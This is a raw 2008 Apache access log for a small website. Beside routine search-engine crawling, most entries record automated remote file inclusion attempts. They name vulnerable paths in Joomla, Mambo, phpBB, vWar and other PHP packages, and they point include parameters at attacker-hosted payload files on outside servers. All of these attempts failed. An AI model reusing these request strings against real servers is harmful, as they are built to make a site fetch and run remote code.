121.173.130.137 - - [22/Jan/2008:17:04:19 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:17:05:23 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:17:05:23 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:17:05:30 -0800] "GET /logs/access_080114.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.19.14.194 - - [22/Jan/2008:17:06:09 -0800] "GET /logs/access_080101.log/index.php?redir=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:17:07:28 -0800] "GET /logs/access_080116.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
80.247.71.13 - - [22/Jan/2008:17:07:52 -0800] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:17:08:34 -0800] "GET /logs/access_080115.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
61.247.217.34 - - [22/Jan/2008:17:09:44 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.34 - - [22/Jan/2008:17:09:44 -0800] "GET /presto/?M=A HTTP/1.1" 200 526 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:17:11:43 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:17:11:44 -0800] "GET /skin/zero_vote/login.php?dir=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.6.22.148 - - [22/Jan/2008:17:15:29 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:17:15:54 -0800] "GET /auth/ldap/authldap.php?includePath=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:17:18:36 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:17:18:39 -0800] "GET /logs/access_071220.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
61.247.217.38 - - [22/Jan/2008:17:29:10 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
61.247.217.38 - - [22/Jan/2008:17:29:10 -0800] "GET / HTTP/1.1" 200 2962 "-" "Yeti/0.01 (nhn/1noon, yetibot@naver.com, check robots.txt daily and follow it)" "www.dmulk.com"
72.30.179.218 - - [22/Jan/2008:17:29:14 -0800] "GET /bikes/dteel/03MAR07/ HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:17:33:24 -0800] "GET /logs/becommunity/community/index.php?pageurl=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
161.53.149.3 - - [22/Jan/2008:17:33:24 -0800] "GET /becommunity/community/index.php?pageurl=http://www.crownvisioncenter.com/company/_notes/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
70.187.77.74 - - [22/Jan/2008:17:33:58 -0800] "GET /logs/access_071109.log HTTP/1.1" 200 29983 "http://search.myway.com/search/GGweb.jhtml?pg=GGmain&action=click&searchfor=%24mosConfig_live_site+%3D+%27%27%3B&pn=2&tpr=&ss=sub&st=site&ptnrS=&ct=PN" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
70.187.77.74 - - [22/Jan/2008:17:33:59 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:17:41:45 -0800] "GET /logs/access_071220.log/auth/ldap/authldap.php?includePath=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:17:41:45 -0800] "GET /logs/auth/ldap/authldap.php?includePath=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:17:42:07 -0800] "GET /logs/access_071216.log/auth/ldap/authldap.php?includePath=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.104 - - [22/Jan/2008:17:46:18 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.135.117.178 - - [22/Jan/2008:17:46:49 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34378" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
208.75.212.136 - - [22/Jan/2008:17:47:16 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.ministerioelshadday.com.br/language/portugues.do.brasil/envirfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.93.255.93 - - [22/Jan/2008:17:47:53 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:17:50:50 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
80.87.131.98 - - [22/Jan/2008:17:50:50 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://fantastiki.net/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.65.116.80 - - [22/Jan/2008:17:58:42 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [22/Jan/2008:17:58:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [22/Jan/2008:17:58:42 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:00:29 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:00:30 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:00:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:00:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:00:33 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.71.13 - - [22/Jan/2008:18:02:36 -0800] "GET //login.php?dir=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.104.238.25 - - [22/Jan/2008:18:03:30 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://user.personal.fi/private/kaisaarto/Joomla/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
77.104.238.25 - - [22/Jan/2008:18:03:44 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://user.personal.fi/private/kaisaarto/Joomla/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:18:05:57 -0800] "GET /logs/access.log/modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:18:05:58 -0800] "GET /modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:18:05:59 -0800] "GET /logs/modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:06:33 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:06:33 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:06:33 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:18:06:34 -0800] "GET /logs/access.log/index.php?body=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:18:06:36 -0800] "GET /index.php?body=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:18:06:38 -0800] "GET /logs/index.php?body=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:18:07:03 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:18:07:03 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:07:04 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:07:04 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:07:04 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.141.167 - - [22/Jan/2008:18:07:56 -0800] "GET /logs/access_080101.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [22/Jan/2008:18:07:56 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [22/Jan/2008:18:07:57 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.141.167 - - [22/Jan/2008:18:08:28 -0800] "GET /logs/access_071229.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:08:48 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:18:09:05 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:18:09:38 -0800] "GET /skin/zero_vote/login.php?dir=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.138.204.132 - - [22/Jan/2008:18:10:09 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.138.204.132 - - [22/Jan/2008:18:10:10 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.169.141.167 - - [22/Jan/2008:18:11:59 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:18:12:12 -0800] "GET /tmp/sess_5188d38ac9f8665777769b8f3db4f428 HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
67.15.153.63 - - [22/Jan/2008:18:12:18 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:12:47 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:12:48 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:12:51 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:13:17 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:18:13:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:18:13:21 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:15:37 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:15:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:15:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:15:45 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:15:45 -0800] "GET //skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:15:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:16:10 -0800] "GET /logs/access_071216.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:16:10 -0800] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:16:25 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:16:25 -0800] "GET //skin/zero_vote/error.php?dir=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:16:25 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:07 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:07 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:07 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:07 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.145 - - [22/Jan/2008:18:17:08 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:17:11 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:17:11 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [22/Jan/2008:18:17:12 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:17:43 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
